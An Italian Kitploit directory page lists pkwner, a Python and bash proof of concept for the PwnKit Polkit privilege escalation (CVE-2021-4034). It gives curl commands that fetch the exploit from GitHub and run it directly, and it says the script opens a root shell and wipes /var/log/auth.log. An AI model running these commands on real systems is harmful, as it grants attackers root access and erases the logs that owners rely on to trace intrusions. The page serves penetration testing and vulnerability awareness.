Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
pkwner — Un PoC in python3 e bash per CVE-2021-4034 di Kim Schulz | Kitploit
Strumenti/GitHubGitHub/kimusan/pkwner
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingRed Teaming
GitHubkimusan/pkwner

pkwner

Un PoC in python3 e bash per CVE-2021-4034 di Kim Schulz

Vedi Repository
2374 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
root@kitploit:~
██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
Un PoC in Python3 e uno in BASH per CVE-2021-4034 di Kim Schulz

Introduzione

Questo è un semplice PoC per l'errore di Polkit recentemente scoperto chiamato PwnKit.

L'ho realizzato sia come script bash che python3 - solo per divertimento.

Il problema è molto semplice da sfruttare ma ha conseguenze enormi, poiché concede facilmente accesso root sulla maggior parte delle macchine Linux dove l'attaccante ha accesso utente locale.

Come eseguirlo

Questi script sono a esecuzione singola, quindi basta fare

root@kitploit:~
python3 pkwner.py

oppure

root@kitploit:~
bash pkwner.sh

Puoi anche eseguirlo direttamente da un webserver (es. questo repository GitHub) tramite:

root@kitploit:~
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)

oppure

root@kitploit:~
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))

In entrambi i casi dovrebbe apparire qualcosa del genere: alt text e alt text

Lo script creerà alcuni file e cartelle ma si pulirà da solo quando la shell root viene aperta - pulirà persino /var/log/auth.log (perché no).

Crediti

  • Qualys per aver trovato il problema e resa pubblica l'informazione
  • Andris Raugulis per aver realizzato uno dei primi PoC da cui trarre ispirazione
  • MiscGang perché misgang@Kalmarunionen sono fantastici
Scarica lo strumento